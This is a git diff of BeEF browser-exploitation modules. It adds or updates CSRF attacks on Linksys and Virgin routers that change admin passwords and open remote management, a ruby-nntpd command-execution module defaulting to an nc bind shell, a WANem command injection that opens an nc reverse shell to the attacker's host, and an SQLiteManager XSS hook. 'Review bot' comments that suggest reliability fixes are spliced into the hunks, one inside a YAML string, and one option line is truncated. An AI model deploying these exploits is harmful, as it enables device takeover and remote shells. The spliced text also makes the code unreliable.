@@ -1,44 +1,37 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -beef.execute(function() { - var port = '<%= @port %>'; - var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; - var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST", - [{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} , - {'type':'hidden', 'name':'http_enable', 'value':'1'}, - {'type':'hidden', 'name':'https_enable', 'value':'0'}, - {'type':'hidden', 'name':'PasswdModify', 'value':'1'}, - {'type':'hidden', 'name':'http_passwd', 'value':passwd}, +beef.execute(function() { + var port = '<%= @port %>'; + var gateway = '<%= @base %>'; + var passwd = '<%= @password %>'; + var timeout = 15; + + var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST", + [ + {'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} , + {'type':'hidden', 'name':'http_enable', 'value':'1'}, + {'type':'hidden', 'name':'https_enable', 'value':'0'}, + {'type':'hidden', 'name':'PasswdModify', 'value':'1'}, + {'type':'hidden', 'name':'http_passwd', 'value':passwd}, {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd}, - {'type':'hidden', 'name':'_http_enable', 'value':'1'}, - 
{'type':'hidden', 'name':'remote_management', 'value':'1'}, - {'type':'hidden', 'name':'web_wl_filter', 'value':'1'}, - {'type':'hidden', 'name':'http_wanport', 'value':port}, - {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, - {'type':'hidden', 'name':'layout', 'value':'en'} + {'type':'hidden', 'name':'_http_enable', 'value':'1'}, + {'type':'hidden', 'name':'remote_management', 'value':'1'}, + {'type':'hidden', 'name':'web_wl_filter', 'value':'1'}, + {'type':'hidden', 'name':'http_wanport', 'value':port}, + {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, + {'type':'hidden', 'name':'layout', 'value':'en'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(wrt54g_iframe); + document.body.removeChild(wrt54g_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml index 4129d26e1..e91577f32 100644 --- a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml +++ b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/linksys_wrt54g_csrf/module.rb b/modules/exploits/router/linksys_wrt54g_csrf/module.rb index 47ee87039..cffed8877 100644 --- a/modules/exploits/router/linksys_wrt54g_csrf/module.rb +++ b/modules/exploits/router/linksys_wrt54g_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Linksys_wrt54g_csrf < BeEF::Core::Command 
diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js index fb0ed4ca4..5c5e94b94 100644 --- a/modules/exploits/router/virgin_superhub_csrf/command.js +++ b/modules/exploits/router/virgin_superhub_csrf/command.js 
@@ -1,47 +1,39 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var port = '<%= @port %>'; + var timeout = 15; - var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [ - {'type':'hidden', 'name':'NetgearPassword', 'value':passwd}, + var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [ + {'type':'hidden', 'name':'NetgearPassword', 'value':passwd}, {'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd}, - {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'} + {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'} ]); - var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [ - {'type':'hidden', 'name':'cbPortScanDetection', 'value':''} + var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [ + {'type':'hidden', 'name':'cbPortScanDetection', 'value':''} ]); - var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [ - {'type':'hidden', 
'name':'NetgearVMRmEnable', 'value':'0x01'}, - {'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port} + var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [ + {'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'}, + {'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(virgin_superhub_iframe1); - document.body.removeChild(virgin_superhub_iframe2); - document.body.removeChild(virgin_superhub_iframe3); + document.body.removeChild(virgin_superhub_iframe1_<%= @command_id %>); + document.body.removeChild(virgin_superhub_iframe2_<%= @command_id %>); + document.body.removeChild(virgin_superhub_iframe3_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/virgin_superhub_csrf/config.yaml b/modules/exploits/router/virgin_superhub_csrf/config.yaml index e767d9fef..b0e6077c5 100644 --- a/modules/exploits/router/virgin_superhub_csrf/config.yaml +++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/virgin_superhub_csrf/module.rb b/modules/exploits/router/virgin_superhub_csrf/module.rb index 83599490c..3d2f288cd 100644 --- a/modules/exploits/router/virgin_superhub_csrf/module.rb +++ b/modules/exploits/router/virgin_superhub_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Virgin_superhub_csrf < BeEF::Core::Command 
diff --git a/modules/exploits/ruby_nntpd_cmd_exec/command.js b/modules/exploits/ruby_nntpd_cmd_exec/command.js
new file mode 100644
index 000000000..5fcd8228d
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var timeout = '<%= @timeout %>';
+
+ // validate payload
+ try {
+ var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+ var payload = '\r\neval `'+cmd+'`\r\nexit\r\n';
+ } catch(e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+ return;
+ }
+
+ // validate target details
+ if (!rport || !rhost || isNaN(rport)) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+ return;
+ }
+ if (rport > 65535 || rport < 0) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+ return;
+ }
+
+ // send commands
+ var nntpd_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(nntpd_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/ruby_nntpd_cmd_exec/config.yaml b/modules/exploits/ruby_nntpd_cmd_exec/config.yaml
new file mode 100644
index 000000000..09abcc5d0
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/config.yaml
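Review bot: The `try { var cmd = '<%= @cmd.gsub(...) %>'; ... } catch(e)` block cannot do what its `// validate payload` comment promises: the `gsub` calls escape quotes but not backslashes or the newlines a textarea option naturally contains, and if the interpolated value breaks the string literal the result is a syntax error in the generated script, which aborts the whole `beef.execute` callback before any `catch` can run, so the `fail=malformed payload` report is never sent. Escaping (or rejecting) backslashes and newlines in the template is the only place that failure can be caught. Separately, `timeout` is kept as the raw string `'<%= @timeout %>'` and, unlike `rport`, is never validated, so a non-numeric value makes `timeout*1000` NaN and `setTimeout` fires immediately; suggest `var timeout = parseInt('<%= @timeout %>', 10); if (isNaN(timeout) || timeout < 0) timeout = 15;` next to the existing target checks.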
@@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + ruby_nntpd_cmd_exec: + enable: true + category: "Exploits" + name: "ruby-nntpd Command Execution" + description: "This module uses the 'eval' verb in ruby-nntpd 0.01dev (default port 1119) to execute operating system commands.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF."
+ authors: ["bcoles"]
+ target:
+ working: ["FF", "C"]
+ not_working: ["IE"]
diff --git a/modules/exploits/ruby_nntpd_cmd_exec/module.rb b/modules/exploits/ruby_nntpd_cmd_exec/module.rb
new file mode 100644
index 000000000..660076af3
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# ruby-nntpd homepage: http://code.google.com/p/ruby-nntpd/
+###
+class Ruby_nntpd_cmd_exec < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+ {'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '1119'},
+ {'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+ {'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'nc -l -p 1337 -e /bin/sh', 'width'=>'200px' },
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+ save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
+ end
+
+end
diff --git a/modules/exploits/spring_framework_malicious_jar/command.js b/modules/exploits/spring_framework_malicious_jar/command.js
index 00804c652..084e32bac 100644
--- a/modules/exploits/spring_framework_malicious_jar/command.js
+++ b/modules/exploits/spring_framework_malicious_jar/command.js
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { jar_file = "<%= @jar_file %>"; diff --git a/modules/exploits/spring_framework_malicious_jar/config.yaml b/modules/exploits/spring_framework_malicious_jar/config.yaml index 1dbaace8f..5ed114fb4 100644 --- a/modules/exploits/spring_framework_malicious_jar/config.yaml +++ b/modules/exploits/spring_framework_malicious_jar/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
@@ -22,4 +12,4 @@ beef: description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).
Specify the URL for a form controller on the target and the URL for your malicious JAR file.
For more information see: http://www.exploit-db.com/exploits/13918/

Versions Affected:
3.0.0 to 3.0.2
2.5.0 to 2.5.6.SEC01 (community releases)
2.5.0 to 2.5.7 (subscription customers)" authors: ["bcoles"] target: - working: ["ALL"] + unknown: ["ALL"] diff --git a/modules/exploits/spring_framework_malicious_jar/module.rb b/modules/exploits/spring_framework_malicious_jar/module.rb index f1777b7f5..0138bbb5a 100644 --- a/modules/exploits/spring_framework_malicious_jar/module.rb +++ b/modules/exploits/spring_framework_malicious_jar/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Spring_framework_malicious_jar < BeEF::Core::Command diff --git a/modules/exploits/sqlitemanager_xss/command.js b/modules/exploits/sqlitemanager_xss/command.js new file mode 100644 index 000000000..c919b9bb6 --- /dev/null +++ b/modules/exploits/sqlitemanager_xss/command.js @@ -0,0 +1,17 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var uri = '<%= @uri.gsub(/'/, "\\'") %>'; + + var serendipity_iframe = beef.dom.createInvisibleIframe(); + serendipity_iframe.setAttribute('src', uri); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + +}); + 
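Review bot: `var serendipity_iframe = beef.dom.createInvisibleIframe();` in the new sqlitemanager_xss command.js is a leftover name from another module and, unlike every other command.js touched in this commit, the iframe carries no `<%= @command_id %>` suffix and is never removed from the DOM, so each run leaves an invisible iframe behind and two concurrent runs would share a name. Suggest `var sqlitemanager_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();` plus a timed `document.body.removeChild(...)` matching the other modules. The `@uri.gsub(/'/, "\\'")` escaping covers single quotes only; a backslash in the URL value would still reach the JS literal unescaped.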
diff --git a/modules/exploits/sqlitemanager_xss/config.yaml b/modules/exploits/sqlitemanager_xss/config.yaml new file mode 100644 index 000000000..c1cb0a5a8 --- /dev/null +++ b/modules/exploits/sqlitemanager_xss/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + sqlitemanager_xss: + enable: true + category: ["Exploits", "XSS"] + name: "SQLiteManager XSS" + description: "Attempts to hook SQLiteManager using XSS.
Tested on version 1.2.4 however other versions are likely to be vulnerable." + authors: ["bcoles"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/sqlitemanager_xss/module.rb b/modules/exploits/sqlitemanager_xss/module.rb new file mode 100644 index 000000000..a5e6b536d --- /dev/null +++ b/modules/exploits/sqlitemanager_xss/module.rb @@ -0,0 +1,24 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Sqlitemanager_xss < BeEF::Core::Command + + def self.options + + configuration = BeEF::Core::Configuration.instance + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" + + return [ + {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://127.0.0.1/sqlite/index.php?dbsel=1"> @datastore['result']}) + end + +end diff --git a/modules/exploits/switch/netgear_gs108t_csrf/command.js b/modules/exploits/switch/netgear_gs108t_csrf/command.js index a2f13c118..67e926e4b 100644 --- a/modules/exploits/switch/netgear_gs108t_csrf/command.js +++ b/modules/exploits/switch/netgear_gs108t_csrf/command.js 
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var base = '<%= @base %>';
 var oldpassword = '<%= @oldpassword %>';
diff --git a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
index 6402686d4..cb2e1d2e7 100644
--- a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
+++ b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/exploits/switch/netgear_gs108t_csrf/module.rb b/modules/exploits/switch/netgear_gs108t_csrf/module.rb
index e4ca0a105..ccccd03ae 100644
--- a/modules/exploits/switch/netgear_gs108t_csrf/module.rb
+++ b/modules/exploits/switch/netgear_gs108t_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Netgear_gs108t_csrf < BeEF::Core::Command
diff --git a/modules/exploits/vtiger_crm_upload_exploit/command.js b/modules/exploits/vtiger_crm_upload_exploit/command.js
index f95758eb6..25b6ea251 100644
--- a/modules/exploits/vtiger_crm_upload_exploit/command.js
+++ b/modules/exploits/vtiger_crm_upload_exploit/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // VtigerCRM <= 5.0.4 "chained exploitation" PoC
 // Hacked up for OWASP New Zealand Day, July 13th 2009
 //
diff --git a/modules/exploits/vtiger_crm_upload_exploit/config.yaml b/modules/exploits/vtiger_crm_upload_exploit/config.yaml
index 1f10055aa..d714c7909 100644
--- a/modules/exploits/vtiger_crm_upload_exploit/config.yaml
+++ b/modules/exploits/vtiger_crm_upload_exploit/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/exploits/vtiger_crm_upload_exploit/module.rb b/modules/exploits/vtiger_crm_upload_exploit/module.rb
index ad2d6f0bc..f355946bf 100644
--- a/modules/exploits/vtiger_crm_upload_exploit/module.rb
+++ b/modules/exploits/vtiger_crm_upload_exploit/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Vtiger_crm_upload_exploit < BeEF::Core::Command
diff --git a/modules/exploits/wanem_command_execution/command.js b/modules/exploits/wanem_command_execution/command.js
new file mode 100644
index 000000000..f8e66229e
--- /dev/null
+++ b/modules/exploits/wanem_command_execution/command.js
@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var lhost = '<%= @lhost %>';
+ var lport = '<%= @lport %>';
+
+ var wanem_iframe = beef.dom.createInvisibleIframe();
+ wanem_iframe.setAttribute('src', 'http://'+rhost+':'+rport+'/WANem/result.php?pc=127.0.0.1;/UNIONFS/home/perc/dosu%20{nc,'+lhost+','+lport+',-e,/bin/sh}%26');
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(wanem_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/wanem_command_execution/config.yaml b/modules/exploits/wanem_command_execution/config.yaml
new file mode 100644
index 000000000..ce2d3f2d7
--- /dev/null
+++ b/modules/exploits/wanem_command_execution/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/
+################################################################################
+beef:
+ module:
+ wanem_command_execution:
+ enable: true
+ category: "Exploits"
+ name: "WAN Emulator Command Execution"
+ description: "Attempts to get a reverse root shell on a WAN Emulator server.
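Review bot: `cleanup = function() {...}` in the new wanem_command_execution/command.js is assigned without `var`, so it becomes a page-global, and `setTimeout("cleanup()", 15000)` then looks that global up by evaluating a string; the zenoss_3x_command_execution/command.js hunk in this same commit defines the same global `cleanup`, so if both modules run inside the 15 s window one timer removes the wrong iframe or throws. Pass the closure directly and drop the global: `setTimeout(function() { document.body.removeChild(wanem_iframe); }, 15000);`. The function-expression assignment is also missing its terminating `;`, unlike every other statement in the file. The same change applies to the zenoss command.js hunk.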
Tested on version 2.3 however other versions are likely to be vulnerable."
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/wanem_command_execution/module.rb b/modules/exploits/wanem_command_execution/module.rb
new file mode 100644
index 000000000..0f67e929e
--- /dev/null
+++ b/modules/exploits/wanem_command_execution/module.rb
@@ -0,0 +1,27 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/
+################################################################################
+class Wanem_command_execution < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ lhost = "#{configuration.get("beef.http.host")}"
+ lhost = "" if lhost == "0.0.0.0"
+ return [
+ { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},
+ { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+ { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
+ { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'},
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
